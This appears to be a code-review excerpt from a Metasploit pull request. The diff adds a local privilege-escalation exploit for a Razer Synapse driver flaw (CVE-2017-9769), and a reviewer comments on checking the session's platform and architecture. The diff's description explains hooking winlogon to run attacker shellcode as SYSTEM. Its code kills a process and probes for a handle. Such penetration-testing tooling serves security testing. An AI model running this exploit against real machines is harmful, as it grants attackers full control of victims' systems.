modules/exploits/windows/local/razer_zwopenprocess.rb

```diff
@@ -0,0 +1,253 @@
+        locally by a malicious application to elevate its privileges to those of
+        NT_AUTHORITY\SYSTEM. The vulnerability lies in a specific IOCTL handler
+        in the rzpnk.sys driver that passes a PID specified by the user to
+        ZwOpenProcess. This can be issued by an application to open a handle to
+        an arbitrary process with the necessary privileges to allocate, read and
+        write memory in the specified process.
+
+        This exploit leverages this vulnerability to open a handle to the
+        winlogon process (which runs as NT_AUTHORITY\SYSTEM) and infect it by
+        installing a hook to execute attacker controlled shellcode. This hook is
+        then triggered on demand by calling user32!LockWorkStation(), resulting
+        in the attacker's payload being executed with the privileges of the
+        infected winlogon process. In order for the issued IOCTL to work, the
+        RazerIngameEngine.exe process must not be running. This exploit will
+        check if it is, and attempt to kill it as necessary.
+
+        The vulnerable software can be found here:
+        https://www.razerzone.com/synapse/. No Razer hardware needs to be
+        connected in order to leverage this vulnerability.
+
+        This exploit is not opsec-safe due to the user being logged out as part
+        of the exploitation process.
+      },
+      'Author'         => 'Spencer McIntyre',
+      'License'        => MSF_LICENSE,
+      'References'     => [
+        ['CVE', '2017-9769'],
+        ['URL', 'https://warroom.securestate.com/cve-2017-9769/']
+      ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          # Tested on (64 bits):
+          # * Windows 7 SP1
+          # * Windows 10.0.10586
+          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC'   => 'thread',
+          'WfsDelay'   => 20
+        },
+      'DefaultTarget'  => 0,
+      'Privileged'     => true,
+      'DisclosureDate' => 'Mar 22 2017'))
+  end
+
+  def check
+    pid = session.sys.process['RazerIngameEngine.exe']
+    session.sys.process.kill(pid) unless pid.nil?
+
+    pid = session.sys.process['winlogon.exe']
+    handle = get_handle(pid)
+    return Exploit::CheckCode::Safe if handle.nil?
+
+    session.railgun.kernel32.CloseHandle(handle)
+    Exploit::CheckCode::Vulnerable
+  end
+
+  def exploit
+    if is_system?
+      fail_with(Failure::None, 'Session is already elevated')
+    end
+
+    if check == Exploit::CheckCode::Safe
+      fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
+    end
+
+    if sysinfo['Architecture'] =~ /wow64/i
+      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
+    elsif sysinfo['Architecture'] == ARCH_X86
+      fail_with(Failure::NoTarget, 'Session host is x86, but only x64 targets are supported')
+    end
```

Comment:
I'm thinking "yes" in this case.

We can just check that `session.platform == 'windows' && session.arch == ARCH_X64` (I think this is how it's done, it uses the session UUID info behind the scenes), and if they don't match then we bail out?

What do you think mate?